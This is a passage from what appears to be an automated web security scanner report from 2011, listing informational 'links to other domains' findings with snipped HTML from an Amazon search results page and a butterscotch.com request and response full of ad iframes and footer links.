<img onload="if (typeof uet =='function') { uet('af'); if(window.jQuery) {var $=jQuery,s=$.search_ph,u=$.searchUE;if(s) {s.checkAjaxLoadCompleted();}if(u) {u.manageLoad();}} } amznJQ.available('search-js-general', function() {SPUtils.triggerATFEvent();});" src="http://ecx.images-amazon.com/images/I/414WF62UEvL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...
<a href="http://www.amazon.com/SmartDraw-com-SDL10-CD-SmartDraw-Legal-Edition/dp/B001GZUXRS/ref=sr_1_4?ie=UTF8&qid=1296769702&sr=8-4">
<img src="http://ecx.images-amazon.com/images/I/51%2BWmZK7LoL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/SmartDraw-Dummies-Daniel-G-Hoffmann/dp/0470396717/ref=sr_1_5?ie=UTF8&qid=1296769702&sr=8-5">
<img src="http://ecx.images-amazon.com/images/I/51twt49EcyL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/Smart-Girls-Playhouse-Nintendo-DS/dp/B000RZ8Z8W/ref=sr_1_6?ie=UTF8&qid=1296769702&sr=8-6">
<img onload="if (typeof uet =='function') { uet('cf'); if(window.jQuery) {var $=jQuery,s=$.search_ph,u=$.searchUE;if(s) {s.checkAjaxLoadCompleted();}if(u) {u.manageLoad();}} }" src="http://ecx.images-amazon.com/images/I/61g5CzgqSPL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/Ingenio-53111-Bilingual-Smart-Projector/dp/B002I7N7C6/ref=sr_1_7?ie=UTF8&qid=1296769702&sr=8-7">
<img src="http://ecx.images-amazon.com/images/I/41tNFifj5jL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/Smart-Strip-Protector-Autoswitching-Technology/dp/B0006PUDQK/ref=sr_1_8?ie=UTF8&qid=1296769702&sr=8-8">
<img src="http://ecx.images-amazon.com/images/I/31gPIXE%2B70L._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/HP-ED494AA-Watt-Smart-Adapter/dp/B000EYRIGQ/ref=sr_1_9?ie=UTF8&qid=1296769702&sr=8-9">
<img src="http://ecx.images-amazon.com/images/I/41oHnkfRLnL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/Kenneth-Cole-York-Smart-Draw/dp/B003TU1EC6/ref=sr_1_10?ie=UTF8&qid=1296769702&sr=8-10">
<img src="http://ecx.images-amazon.com/images/I/51zrTIZ470L._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/CorelDRAW-Graphics-Suite-X5-Education/dp/B0039XZ3T8/ref=sr_1_11?ie=UTF8&qid=1296769702&sr=8-11">
<img src="http://ecx.images-amazon.com/images/I/41rxmDScSiL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/Crock-Pot-38501-W-5-Quart-Smart-Pot-Cooker/dp/B00008I8NS/ref=sr_1_12?ie=UTF8&qid=1296769702&sr=8-12">
<img src="http://ecx.images-amazon.com/images/I/410RT22WNWL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/Smart-Trackerz-Contruction-Car-Track/dp/B001MY551C/ref=sr_1_13?ie=UTF8&qid=1296769702&sr=8-13">
<img src="http://ecx.images-amazon.com/images/I/31g0iKiDGDL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/Wagan-Smart-Watt-Power-Inverter/dp/B000MXBNT2/ref=sr_1_14?ie=UTF8&qid=1296769702&sr=8-14">
<img src="http://ecx.images-amazon.com/images/I/31AJQdkciGL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/School-Smart-Write--Transparency-Film/dp/B003V1BPXG/ref=sr_1_15?ie=UTF8&qid=1296769702&sr=8-15">
<img src="http://ecx.images-amazon.com/images/I/51zoVCeXqyL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/New-Charles-Smart-Adapter-Yellow/dp/B004JQJOP8/ref=sr_1_16?ie=UTF8&qid=1296769702&sr=8-16">
<img src="http://ecx.images-amazon.com/images/I/41hhubL2SZL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<span style="white-space:nowrap;"><a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMRW2cUO4j2feSa-w61.slPRpWUTQRdHFDzpOVB62vzmMNxmUhPKr1K-cedKgWgAL.XwjWQKngMrT1gHu5Xz75idxLJgCrsQVbRVDbaqyU2goEGtiZriPSu-onWzWjRRGMN9rn5Sh88ZdEBZu9HzwpH-LZ0GytsEtSPrEocmaVKnOnRFji8KgoaBOigiUWHmZDKi3FL248DnFmUMKDEYMyT5ucuZ7NbFbFaYBj6GtUE95oH5F.a-26q6YFRX.Iy77AzHuZ36Xp.hfwb7RHnOcGenTTfvNyqQ63YIKcOsM78ZgK6SCIc2EyPvuOo4-Y78jNKXYjp5OhkM3mnNym-WtuwFjyODqgneOVE51GP.gPSYzL.Xl-vSFsmtM64XqDUpL1orU-ApCddrrug0zcGU.hHlFeUQbpIi0h86Gm2mJIHCN31EjFXufG-nC-tcST-wg-qxzEfflRNYdCxf.9fJHKBQZf-PIUlmYSxXIiaGAe1e6kaMzSvLe5gbf5tDH9a1CbD2.kP2cX16u.WjaVwT9RogbUDqrdobzquwCFhVD5wbtGkUzei8PZU_&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
<span style="display: inline-block; padding-right: 12px;"><a rel="nofollow" href="http://rd.a9.com/srv/redirect/?info=AMRW2cUO4j2feSa-w61.slPRpWUTQRdHFDzpOVB62vzmMNxmUhPKr1K-cedKgWgAL.XwjWQKngMrT1gHu5Xz75idxLJgCrsQVbRVDbaqyU2goEGtiZriPSu-onWzWjRRGMN9rn5Sh88ZdEBZu9HzwpH-LZ0GytsEtSPrEocmaVKnOnRFji8KgoaBOigiUWHmZDKi3FL248DnFmUMKDEYMyT5ucuZ7NbFbFaYBj6GtUE95oH5F.a-26q6YFRX.Iy77AzHuZ36Xp.hfwb7RHnOcGenTTfvNyqQ63YIKcOsM78ZgK6SCIc2EyPvuOo4-Y78jNKXYjp5OhkM3mnNym-WtuwFjyODqgneOVE51GP.gPSYzL.Xl-vSFsmtM64XqDUpL1orU-ApCddrrug0zcGU.hHlFeUQbpIi0h86Gm2mJIHCN31EjFXufG-nC-tcST-wg-qxzEfflRNYdCxf.9fJHKBQZf-PIUlmYSxXIiaGAe1e6kaMzSvLe5gbf5tDH9a1CbD2.kP2cX16u.WjaVwT9RogbUDqrdobzquwCFhVD5wbtGkUzei8PZU_&awt=1&s=" target="_new"><img src="http://g-ecx.images-amazon.com/images/G/01/icons/icon-offsite-sl-6828-t4._V175981215_.png" width="23" alt="opens new browser window" align="absbottom" style="padding-bottom: 0px; margin-bottom:-3px" height="20" border="0" /></a>
...[SNIP]...
<td style="padding-left: 2px;">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMRW2cUO4j2feSa-w61.slPRpWUTQRdHFDzpOVB62vzmMNxmUhPKr1K-cedKgWgAL.XwjWQKngMrT1gHu5Xz75idxLJgCrsQVbRVDbaqyU2goEGtiZriPSu-onWzWjRRGMN9rn5Sh88ZdEBZu9HzwpH-LZ0GytsEtSPrEocmaVKnOnRFji8KgoaBOigiUWHmZDKi3FL248DnFmUMKDEYMyT5ucuZ7NbFbFaYBj6GtUE95oH5F.a-26q6YFRX.Iy77AzHuZ36Xp.hfwb7RHnOcGenTTfvNyqQ63YIKcOsM78ZgK6SCIc2EyPvuOo4-Y78jNKXYjp5OhkM3mnNym-WtuwFjyODqgneOVE51GP.gPSYzL.Xl-vSFsmtM64XqDUpL1orU-ApCddrrug0zcGU.hHlFeUQbpIi0h86Gm2mJIHCN31EjFXufG-nC-tcST-wg-qxzEfflRNYdCxf.9fJHKBQZf-PIUlmYSxXIiaGAe1e6kaMzSvLe5gbf5tDH9a1CbD2.kP2cX16u.WjaVwT9RogbUDqrdobzquwCFhVD5wbtGkUzei8PZU_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.<b>
...[SNIP]...
<span style="white-space:nowrap;"><a target="_new" href="http://rd.a9.com/srv/redirect/?info=AIy4ZJoLdXo.cU4I3fmpfwxSkvbjFVkcMoDiFvuE4DtShXVaQLTUtkRe-PBHXh40UVIrAdqBmaW8KBMZpOR4qqjRGUWdXkdbRXZr1qqP.AioRojE8JCOgdFBBybvnuIY4aD58hIVWZh3zp.7NS8-M2xiVXKit1vADsNUxT2mEU27nC5Eg1huvZUGkcPZv6VFFGnRU3m6EOHASs80-gBqhqdXUMnxswMfVGFpMWV0-F.TjwRFjEATtQgwSswep4CLFLSDvnviZftqrzlXYNhCscpoa9AIaEh-F.LXKLTXs3iIWuQR9Im4XGdLnPxjBu3kCgXmVoFqonMgmhVmqUhLv1g1D54Pi2NEtvenOUUEXjq98Ic.6-XZpmzsOAX7i4TtaapFC5fdVZ2UOT8rkYktw6PfLRoo1scPtXoO9M8YYpEaPROxmMsLZ7f.yuRxMUCr5Q__&awt=1&s=" rel="nofollow">Visio</a>
...[SNIP]...
<span style="display: inline-block; padding-right: 12px;"><a rel="nofollow" href="http://rd.a9.com/srv/redirect/?info=AIy4ZJoLdXo.cU4I3fmpfwxSkvbjFVkcMoDiFvuE4DtShXVaQLTUtkRe-PBHXh40UVIrAdqBmaW8KBMZpOR4qqjRGUWdXkdbRXZr1qqP.AioRojE8JCOgdFBBybvnuIY4aD58hIVWZh3zp.7NS8-M2xiVXKit1vADsNUxT2mEU27nC5Eg1huvZUGkcPZv6VFFGnRU3m6EOHASs80-gBqhqdXUMnxswMfVGFpMWV0-F.TjwRFjEATtQgwSswep4CLFLSDvnviZftqrzlXYNhCscpoa9AIaEh-F.LXKLTXs3iIWuQR9Im4XGdLnPxjBu3kCgXmVoFqonMgmhVmqUhLv1g1D54Pi2NEtvenOUUEXjq98Ic.6-XZpmzsOAX7i4TtaapFC5fdVZ2UOT8rkYktw6PfLRoo1scPtXoO9M8YYpEaPROxmMsLZ7f.yuRxMUCr5Q__&awt=1&s=" target="_new"><img src="http://g-ecx.images-amazon.com/images/G/01/icons/icon-offsite-sl-6828-t4._V175981215_.png" width="23" alt="opens new browser window" align="absbottom" style="padding-bottom: 0px; margin-bottom:-3px" height="20" border="0" /></a>
...[SNIP]...
<td style="padding-left: 2px;">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AIy4ZJoLdXo.cU4I3fmpfwxSkvbjFVkcMoDiFvuE4DtShXVaQLTUtkRe-PBHXh40UVIrAdqBmaW8KBMZpOR4qqjRGUWdXkdbRXZr1qqP.AioRojE8JCOgdFBBybvnuIY4aD58hIVWZh3zp.7NS8-M2xiVXKit1vADsNUxT2mEU27nC5Eg1huvZUGkcPZv6VFFGnRU3m6EOHASs80-gBqhqdXUMnxswMfVGFpMWV0-F.TjwRFjEATtQgwSswep4CLFLSDvnviZftqrzlXYNhCscpoa9AIaEh-F.LXKLTXs3iIWuQR9Im4XGdLnPxjBu3kCgXmVoFqonMgmhVmqUhLv1g1D54Pi2NEtvenOUUEXjq98Ic.6-XZpmzsOAX7i4TtaapFC5fdVZ2UOT8rkYktw6PfLRoo1scPtXoO9M8YYpEaPROxmMsLZ7f.yuRxMUCr5Q__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.axure.com</a>
...[SNIP]...
<span style="white-space:nowrap;"><a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMirGGa9-X9hffhlEroUHpmdNFv5vzsb5XgyYzShIUScT3FbJmXDiESgstvYqkfniMGZDrgyGrXe3VyCIZYJBsT2lfkWDglQurgNOKbihP50Q1Pv5ri1SD2UzGXwq-MvLZkIVRytF9RYomHe9CC0MPqe2qbKPphTdcBJXbnSdTYTcL.4slafjGbp7-Z5TbGszKrTma9QpQUcxgLKZaPB5DsODbYeXvmhKc7ATj9h.Gi1RcclhJ2jO1tMR-DMM95MeGhl8Au20qGoZDI7d4fTW3OydWKXDoDx4JJmNWIKDdQ44.lD24-2FxRdLHHmteu-QVUlRcmkywpW7eSltDQYSUpKkbkt4ruwbPblycVITwmJxaKcYvjADzstQnJxekpzXSXeXUWsnOmDdCJ4zSOLCpjb86YiZPaedhNP6Q9w42xrHNq.vE4TXCP6QVZAHUdTWz9-rhNSVkJRrUEDqiEeXo6iNrqyhG6OjgthUrbuUT3-6mWw2FIKnLSI3kmR4IqXf1D8cpOCxEaNQZJ2D-L9AqflRMl7u4nYwzTUglvI.1Z.&awt=1&s=" rel="nofollow">Create Smarter Org Charts</a>
...[SNIP]...
<span style="display: inline-block; padding-right: 12px;"><a rel="nofollow" href="http://rd.a9.com/srv/redirect/?info=AMirGGa9-X9hffhlEroUHpmdNFv5vzsb5XgyYzShIUScT3FbJmXDiESgstvYqkfniMGZDrgyGrXe3VyCIZYJBsT2lfkWDglQurgNOKbihP50Q1Pv5ri1SD2UzGXwq-MvLZkIVRytF9RYomHe9CC0MPqe2qbKPphTdcBJXbnSdTYTcL.4slafjGbp7-Z5TbGszKrTma9QpQUcxgLKZaPB5DsODbYeXvmhKc7ATj9h.Gi1RcclhJ2jO1tMR-DMM95MeGhl8Au20qGoZDI7d4fTW3OydWKXDoDx4JJmNWIKDdQ44.lD24-2FxRdLHHmteu-QVUlRcmkywpW7eSltDQYSUpKkbkt4ruwbPblycVITwmJxaKcYvjADzstQnJxekpzXSXeXUWsnOmDdCJ4zSOLCpjb86YiZPaedhNP6Q9w42xrHNq.vE4TXCP6QVZAHUdTWz9-rhNSVkJRrUEDqiEeXo6iNrqyhG6OjgthUrbuUT3-6mWw2FIKnLSI3kmR4IqXf1D8cpOCxEaNQZJ2D-L9AqflRMl7u4nYwzTUglvI.1Z.&awt=1&s=" target="_new"><img src="http://g-ecx.images-amazon.com/images/G/01/icons/icon-offsite-sl-6828-t4._V175981215_.png" width="23" alt="opens new browser window" align="absbottom" style="padding-bottom: 0px; margin-bottom:-3px" height="20" border="0" /></a>
...[SNIP]...
<td style="padding-left: 2px;">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMirGGa9-X9hffhlEroUHpmdNFv5vzsb5XgyYzShIUScT3FbJmXDiESgstvYqkfniMGZDrgyGrXe3VyCIZYJBsT2lfkWDglQurgNOKbihP50Q1Pv5ri1SD2UzGXwq-MvLZkIVRytF9RYomHe9CC0MPqe2qbKPphTdcBJXbnSdTYTcL.4slafjGbp7-Z5TbGszKrTma9QpQUcxgLKZaPB5DsODbYeXvmhKc7ATj9h.Gi1RcclhJ2jO1tMR-DMM95MeGhl8Au20qGoZDI7d4fTW3OydWKXDoDx4JJmNWIKDdQ44.lD24-2FxRdLHHmteu-QVUlRcmkywpW7eSltDQYSUpKkbkt4ruwbPblycVITwmJxaKcYvjADzstQnJxekpzXSXeXUWsnOmDdCJ4zSOLCpjb86YiZPaedhNP6Q9w42xrHNq.vE4TXCP6QVZAHUdTWz9-rhNSVkJRrUEDqiEeXo6iNrqyhG6OjgthUrbuUT3-6mWw2FIKnLSI3kmR4IqXf1D8cpOCxEaNQZJ2D-L9AqflRMl7u4nYwzTUglvI.1Z.&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.orgplus.com</a>
...[SNIP]...
<span style="white-space:nowrap;"><a target="_new" href="http://rd.a9.com/srv/redirect/?info=APIQIUdFkkWgFKjh3k7DzFG5nx5Tzg7pBsYm34oDIo-CmcqPY15zuZUhG0.8Y3jaF3l50jH4yjxW5v20my-cg8tkn.odKvO-13VZhbPcVsLxuPgEmhNMjaGaOMWhjclm6cnGAwC4GyFZwVMA1rjOHVj8GOCA2kzYzMqkVK9gKAU3tOFLiMOM9ghguxAVXU7fe1z8njKhdQxEL39e0ybxmHA2PbcFG.Dcsvc4.klESNwwe0eticgKxJGCXRIoXAMhha4hQVJTGSoaTB3n5aW29iIzD3Hj0VIm1CoW8BzeE7HqSaw0kRIE1imo713jUSGFYPGXFeorcAujfj94-VPYmiXdG-y8vIAxDAKvhCr6m2G6NUEsEKgnZFE..BOgpjV4Tzg51CMm-CoXPMpACALfIfeYvAD2M3evg1mJdsh7GbDAK0nh4PQKYaYIOJFHi-.jSJlLCdgS.LdJcNKESrV7zFgnEot6SpcbepoJ7nHjcLE.&awt=1&s=" rel="nofollow">Visio 2007 Training</a>
...[SNIP]...
<span style="display: inline-block; padding-right: 12px;"><a rel="nofollow" href="http://rd.a9.com/srv/redirect/?info=APIQIUdFkkWgFKjh3k7DzFG5nx5Tzg7pBsYm34oDIo-CmcqPY15zuZUhG0.8Y3jaF3l50jH4yjxW5v20my-cg8tkn.odKvO-13VZhbPcVsLxuPgEmhNMjaGaOMWhjclm6cnGAwC4GyFZwVMA1rjOHVj8GOCA2kzYzMqkVK9gKAU3tOFLiMOM9ghguxAVXU7fe1z8njKhdQxEL39e0ybxmHA2PbcFG.Dcsvc4.klESNwwe0eticgKxJGCXRIoXAMhha4hQVJTGSoaTB3n5aW29iIzD3Hj0VIm1CoW8BzeE7HqSaw0kRIE1imo713jUSGFYPGXFeorcAujfj94-VPYmiXdG-y8vIAxDAKvhCr6m2G6NUEsEKgnZFE..BOgpjV4Tzg51CMm-CoXPMpACALfIfeYvAD2M3evg1mJdsh7GbDAK0nh4PQKYaYIOJFHi-.jSJlLCdgS.LdJcNKESrV7zFgnEot6SpcbepoJ7nHjcLE.&awt=1&s=" target="_new"><img src="http://g-ecx.images-amazon.com/images/G/01/icons/icon-offsite-sl-6828-t4._V175981215_.png" width="23" alt="opens new browser window" align="absbottom" style="padding-bottom: 0px; margin-bottom:-3px" height="20" border="0" /></a>
...[SNIP]...
<td style="padding-left: 2px;">
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=APIQIUdFkkWgFKjh3k7DzFG5nx5Tzg7pBsYm34oDIo-CmcqPY15zuZUhG0.8Y3jaF3l50jH4yjxW5v20my-cg8tkn.odKvO-13VZhbPcVsLxuPgEmhNMjaGaOMWhjclm6cnGAwC4GyFZwVMA1rjOHVj8GOCA2kzYzMqkVK9gKAU3tOFLiMOM9ghguxAVXU7fe1z8njKhdQxEL39e0ybxmHA2PbcFG.Dcsvc4.klESNwwe0eticgKxJGCXRIoXAMhha4hQVJTGSoaTB3n5aW29iIzD3Hj0VIm1CoW8BzeE7HqSaw0kRIE1imo713jUSGFYPGXFeorcAujfj94-VPYmiXdG-y8vIAxDAKvhCr6m2G6NUEsEKgnZFE..BOgpjV4Tzg51CMm-CoXPMpACALfIfeYvAD2M3evg1mJdsh7GbDAK0nh4PQKYaYIOJFHi-.jSJlLCdgS.LdJcNKESrV7zFgnEot6SpcbepoJ7nHjcLE.&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">corporatetrainingmaterials.com</a>
...[SNIP]...
<a href="#" onclick="return howsMySearchOnClickVote('yes', 'hms-buttons-yes')">
<img src="http://g-ecx.images-amazon.com/images/G/01/nav2/buttons/btn-yes._V192545584_.gif" width="31" alt="Yes" class="howsMySearchButtonActive" title="Yes" height="17" border="0" /></a>
...[SNIP]...
<a href="#" onclick="return howsMySearchOnClickVote('no', 'hms-buttons-no')" >
<img src="http://g-ecx.images-amazon.com/images/G/01/nav2/buttons/btn-no._V192545588_.gif" width="31" alt="No" class="howsMySearchButtonActive" title="No" height="17" border="0" /></a>
...[SNIP]...
<span id="hms-buttons-yes" style="display:none">
<img src="http://g-ecx.images-amazon.com/images/G/01/nav2/buttons/btn-yes-inactive._V192545585_.gif" width="31" alt="Yes" class="howsMySearchButtonInactiveSelected" title="Yes" height="17" border="0" />
<img src="http://g-ecx.images-amazon.com/images/G/01/nav2/buttons/btn-no-inactive-ns._V192545588_.gif" width="31" alt="No" class="howsMySearchButtonInactiveUnselected" title="No" height="17" border="0" />
</span>
...[SNIP]...
<span id="hms-buttons-no" style="display:none">
<img src="http://g-ecx.images-amazon.com/images/G/01/nav2/buttons/btn-yes-inactive-ns._V192545585_.gif" width="31" alt="Yes" class="howsMySearchButtonInactiveUnselected" title="Yes" height="17" border="0" />
<img src="http://g-ecx.images-amazon.com/images/G/01/nav2/buttons/btn-no-inactive._V192545591_.gif" width="31" alt="No" class="howsMySearchButtonInactiveSelected" title="No" height="17" border="0" />
</span>
...[SNIP]...
<td><a href="http://a9.com/?src=amz_spb_sas"><img src="http://g-ecx.images-amazon.com/images/G/01/search-browse/powered-by-a9._V192216971_.gif" alt="A9" width="24" height="24" border="0"/></a>
...[SNIP]...
<a href="/Amazon-Kindle-Deals-and-offers/lm/R36F3EI1NQ3B4C/ref=cm_lmt_srch_f_1_rsrssi0/177-8526459-0757201"><img src="http://ecx.images-amazon.com/images/I/417XQ0XwQuL._AA75_.jpg" width="75" alt="Amazon Kindle Deals and offers" height="75" border="0" /></a>
...[SNIP]...
<span style="white-space: nowrap;">Guru"<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/carrot._V192251235_.gif" class="custPopRight" style="border: none;" alt="" /></span>
...[SNIP]...
<a href="/Urban-Survival-Ultimate-Go-bag/lm/R24QULAHP6X3HU/ref=cm_lmt_srch_f_2_rsrssi0/177-8526459-0757201"><img src="http://ecx.images-amazon.com/images/I/417XQ0XwQuL._AA75_.jpg" width="75" alt="Urban Survival Ultimate Go-bag" height="75" border="0" /></a>
...[SNIP]...
<span style="white-space: nowrap;">heidi"<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/carrot._V192251235_.gif" class="custPopRight" style="border: none;" alt="" /></span></a><br /><br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" /><a href="/gp/richpub/listmania/createpipeline/ref=cm_lmt_srch_c/177-8526459-0757201">
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
<div style="text-align:center; padding-bottom:4px;"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/iab/advertisement-sm-head._V192575712_.gif" height="7" alt="Ad" width="123" border="0"/></div>
...[SNIP]...
<noscript><iframe id="cachebust_329752" name="cachebust_329752" src="http://ad.doubleclick.net/adi/amzn.us.sr.aps;sz=160x600;sn=507846;u=d9c386d73c684cc5babb94ecd37b7713;ord=1TM9NR3WYFJRE0JGNVSH;s=i0;s=i1;s=i3;s=i4;s=i5;s=i6;s=i7;s=i8;s=i9;s=1009;s=32;s=k3;s=k122;s=k142;s=k12;s=k150;s=u16;s=m1;s=u5;s=u8;s=m4;s=u9;z=2;tile=1?" title="Ad" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" style="" width="170" height="605"></iframe>
...[SNIP]...
<noscript><iframe marginheight="0" marginwidth="0" align="left" id="pixel_75282" style="width:0px; height:0px; border:0px;" height="0" width="0" src="http://d3l3lkinz3f56t.cloudfront.net/turn-proxy.html?#embed=&pid=40&evt=99&cat=1009,32" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
</div>


<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="200" alt="" height="1" border="0" />
</div>
...[SNIP]...
</div>

<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-3._V248984170_.css' rel='stylesheet'>
<script type='text/javascript'>
...[SNIP]...
<a href="/ref=footer_logo/177-8526459-0757201"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

18.116. http://www.butterscotch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<a href="javascript: void(0);" onClick="fbConnect()">
<img src="http://static.ak.fbcdn.net/rsrc.php/zB6N8/hash/4li2k73z.gif" class='fb_connect'>
</a>
...[SNIP]...
<div class="ad300x250">
<iframe id='aed03704' name='aed03704' src='http://www8.tucows.com/delivery/afr.php?what=Demogirl,_300x250,Facebook,_300x250,photos,_300x250|zone:145&amp;cb=958ab849'
framespacing='0' frameborder='no' scrolling='no' width='300' height='250'>

<a href='http://www8.tucows.com/delivery/ck.php?n=ac55bf6f&amp;cb=958ab849' target='_blank'><img
src='http://www8.tucows.com/delivery/avw.php?what=Demogirl,_300x250,Facebook,_300x250,photos,_300x250|zone:145&amp;cb=958ab849&amp;n=ac55bf6f' border='0' alt='' />
</a></iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
</div>
<div class="ad300x250">
<iframe id='aed03704' name='aed03704' src='http://www8.tucows.com/delivery/afr.php?what=Demogirl,_300x250,Facebook,_300x250,photos,_300x250|zone:186&amp;cb=ac2cba24'
framespacing='0' frameborder='no' scrolling='no' width='300' height='250'>

<a href='http://www8.tucows.com/delivery/ck.php?n=ac55bf6f&amp;cb=ac2cba24' target='_blank'><img
src='http://www8.tucows.com/delivery/avw.php?what=Demogirl,_300x250,Facebook,_300x250,photos,_300x250|zone:186&amp;cb=ac2cba24&amp;n=ac55bf6f' border='0' alt='' />
</a></iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...
<br />
<a class="menufont ftrmnuitm" href="http://www.tucows.com/terms.html">Terms</a>
...[SNIP]...
<br />
<a class="menufont ftrmnuitm" href="http://www.tucows.com/sitemap.html">Site Map</a>
...[SNIP]...
<br />
<a class="menufont ftrmnuitm" href="https://author.tucows.com">Submit Software</a><br />
<a class="menufont ftrmnuitm" href="http://www.tucows.com/author_ratings.html">Ratings Guide</a>
...[SNIP]...
<div class="footerlinks col3">
<a class="menufont ftrmnuitm" href="http://www.tucows.com/affiliate/index.html">Become a Partner</a><br />
<a href="http://domainhelp.tucows.com">Domain Help</a><br />
<a href="http://www.tucowsinc.com/careers/">Jobs</a><br />
<a href="http://www.tucowsinc.com/">Services</a><br />
<a href="http://domainhelp.tucows.com/domains/whois/whoislookup/">Help & Whois</a>
